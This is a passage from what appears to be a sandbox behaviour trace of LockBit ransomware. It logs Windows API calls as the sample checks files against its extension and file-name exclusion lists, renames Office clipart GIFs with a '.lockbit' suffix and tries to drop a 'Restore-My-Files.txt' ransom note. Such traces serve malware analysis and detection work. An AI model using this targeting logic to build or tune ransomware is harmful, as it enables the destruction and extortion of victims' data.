Office\\CLIPART\\PUB60COR\\AG00037_.GIF.lockbit") returned 72 [0100.772] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00037_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13e4 [0100.772] CreateIoCompletionPort (FileHandle=0x13e4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0100.773] malloc (_Size=0x40068) returned 0x1ff1e60 [0100.773] GetFileSizeEx (in: hFile=0x13e4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=6684) returned 1 [0100.773] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0100.776] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0100.776] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0100.776] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0100.779] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0100.779] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0100.779] ReadFile (in: hFile=0x13e4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0100.790] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0100.790] malloc (_Size=0xa6) returned 0x77d800 [0100.790] NtSetInformationFile (FileHandle=0x13e4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0100.792] free (_Block=0x77d800) [0100.792] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0100.792] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0100.792] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0100.793] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47589c00, ftCreationTime.dwHighDateTime=0x1bf325d, ftLastAccessTime.dwLowDateTime=0x512f1610, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x47589c00, ftLastWriteTime.dwHighDateTime=0x1bf325d, nFileSizeHigh=0x0, nFileSizeLow=0xcb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="AG00038_.GIF", cAlternateFileName="")) returned 1 [0100.793] lstrcmpiW (lpString1=".", lpString2="AG00038_.GIF") returned -1 [0100.793] lstrcmpiW (lpString1="..", lpString2="AG00038_.GIF") returned -1 [0100.793] PathFindExtensionW (pszPath="AG00038_.GIF") returned=".GIF" [0100.793] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0100.793] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0100.793] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0100.793] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0100.793] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0100.793] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0100.793] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0100.793] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0100.793] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0100.793] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0100.793] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0100.793] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0100.793] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0100.793] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0100.793] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0100.793] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0100.793] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0100.793] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0100.793] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0100.793] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0100.794] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0100.794] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0100.794] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0100.794] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0100.794] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0100.794] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0100.794] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0100.794] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0100.794] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0100.794] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0100.794] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0100.794] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0100.794] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0100.794] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0100.794] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0100.794] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0100.794] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0100.794] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0100.794] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0100.794] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0100.794] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0100.794] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0100.794] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0100.794] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0100.794] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0100.794] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0100.795] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0100.795] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AG00038_.GIF") returned 1 [0100.795] lstrcmpiW (lpString1="ntldr", lpString2="AG00038_.GIF") returned 1 [0100.795] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AG00038_.GIF") returned 1 [0100.795] lstrcmpiW (lpString1="bootsect.bak", lpString2="AG00038_.GIF") returned 1 [0100.795] lstrcmpiW (lpString1="autorun.inf", lpString2="AG00038_.GIF") returned 1 [0100.795] lstrcmpiW (lpString1="thumbs.db", lpString2="AG00038_.GIF") returned 1 [0100.795] lstrcmpiW (lpString1="iconcache.db", lpString2="AG00038_.GIF") returned 1 [0100.795] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0100.795] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF") returned=".GIF" [0100.795] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0100.795] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0100.795] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0100.795] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0100.795] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0100.795] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0100.795] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0100.795] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0100.795] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0100.795] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0100.795] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0100.795] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0100.795] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0100.796] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0100.796] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0100.796] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0100.796] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0100.796] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0100.796] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0100.796] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0100.796] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0100.796] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0100.796] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0100.796] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0100.796] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0100.796] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0100.796] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0100.796] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0100.796] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF.lockbit") returned 72 [0100.796] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00038_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13e4 [0100.798] CreateIoCompletionPort (FileHandle=0x13e4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0100.798] malloc (_Size=0x40068) returned 0x1ff1e60 [0100.798] GetFileSizeEx (in: hFile=0x13e4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=3251) returned 1 [0100.798] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0100.802] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0100.802] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0100.802] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0100.805] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0100.805] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0100.805] ReadFile (in: hFile=0x13e4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0100.822] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0100.822] malloc (_Size=0xa6) returned 0x77d800 [0100.822] NtSetInformationFile (FileHandle=0x13e4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0100.822] free (_Block=0x77d800) [0100.822] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0100.822] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0100.822] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0100.823] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f4fc100, ftCreationTime.dwHighDateTime=0x1bd4b49, ftLastAccessTime.dwLowDateTime=0x5eb42550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5f4fc100, ftLastWriteTime.dwHighDateTime=0x1bd4b49, nFileSizeHigh=0x0, nFileSizeLow=0x1fa1, dwReserved0=0x0, dwReserved1=0x0, cFileName="AG00040_.GIF", cAlternateFileName="")) returned 1 [0100.823] lstrcmpiW (lpString1=".", lpString2="AG00040_.GIF") returned -1 [0100.823] lstrcmpiW (lpString1="..", lpString2="AG00040_.GIF") returned -1 [0100.823] PathFindExtensionW (pszPath="AG00040_.GIF") returned=".GIF" [0100.823] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0100.823] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0100.823] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0100.823] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0100.823] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0100.823] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0100.823] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0100.823] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0100.823] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0100.823] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0100.823] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0100.823] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0100.823] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0100.823] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0100.823] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0100.824] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0100.824] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0100.824] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0100.824] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0100.824] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0100.824] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0100.824] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0100.824] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0100.824] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0100.824] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0100.824] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0100.824] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0100.824] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0100.824] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0100.824] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0100.824] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0100.824] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0100.824] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0100.824] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0100.824] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0100.824] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0100.824] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0100.824] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0100.825] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0100.825] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0100.825] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0100.825] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0100.825] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0100.825] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0100.825] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0100.825] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0100.825] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0100.825] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AG00040_.GIF") returned 1 [0100.825] lstrcmpiW (lpString1="ntldr", lpString2="AG00040_.GIF") returned 1 [0100.825] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AG00040_.GIF") returned 1 [0100.825] lstrcmpiW (lpString1="bootsect.bak", lpString2="AG00040_.GIF") returned 1 [0100.825] lstrcmpiW (lpString1="autorun.inf", lpString2="AG00040_.GIF") returned 1 [0100.825] lstrcmpiW (lpString1="thumbs.db", lpString2="AG00040_.GIF") returned 1 [0100.825] lstrcmpiW (lpString1="iconcache.db", lpString2="AG00040_.GIF") returned 1 [0100.825] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0100.825] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF") returned=".GIF" [0100.825] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0100.825] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0100.825] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0100.825] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0100.826] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0100.826] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0100.826] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0100.826] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0100.826] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0100.826] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0100.826] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0100.826] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0100.826] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0100.826] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0100.826] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0100.826] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0100.826] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0100.826] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0100.826] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0100.826] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0100.826] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0100.826] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0100.826] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0100.826] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0100.826] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0100.826] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0100.827] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0100.827] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0100.827] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF.lockbit") returned 72 [0100.827] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00040_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13e4 [0100.827] CreateIoCompletionPort (FileHandle=0x13e4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0100.827] malloc (_Size=0x40068) returned 0x1ff1e60 [0100.827] GetFileSizeEx (in: hFile=0x13e4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=8097) returned 1 [0100.828] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0100.835] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0100.835] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0100.835] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0100.838] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0100.838] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0100.838] ReadFile (in: hFile=0x13e4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0100.841] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0100.841] malloc (_Size=0xa6) returned 0x77d800 [0100.841] NtSetInformationFile (FileHandle=0x13e4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0100.842] free (_Block=0x77d800) [0100.842] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0100.842] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0100.842] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0100.842] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x262e5400, ftCreationTime.dwHighDateTime=0x1bd4c10, ftLastAccessTime.dwLowDateTime=0x512f1610, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x262e5400, ftLastWriteTime.dwHighDateTime=0x1bd4c10, nFileSizeHigh=0x0, nFileSizeLow=0x1e06, dwReserved0=0x0, dwReserved1=0x0, cFileName="AG00052_.GIF", cAlternateFileName="")) returned 1 [0100.842] lstrcmpiW (lpString1=".", lpString2="AG00052_.GIF") returned -1 [0100.842] lstrcmpiW (lpString1="..", lpString2="AG00052_.GIF") returned -1 [0100.842] PathFindExtensionW (pszPath="AG00052_.GIF") returned=".GIF" [0100.842] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0100.842] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0100.842] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0100.843] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0100.843] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0100.843] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0100.843] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0100.843] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0100.843] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0100.843] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0100.843] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0100.843] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0100.843] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0100.843] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0100.843] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0100.843] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0100.843] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0100.843] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0100.843] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0100.843] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0100.843] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0100.843] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0100.844] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0100.844] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0100.844] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0100.844] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0100.844] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0100.844] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0100.844] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0100.844] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0100.844] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0100.844] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0100.844] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0100.844] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0100.844] 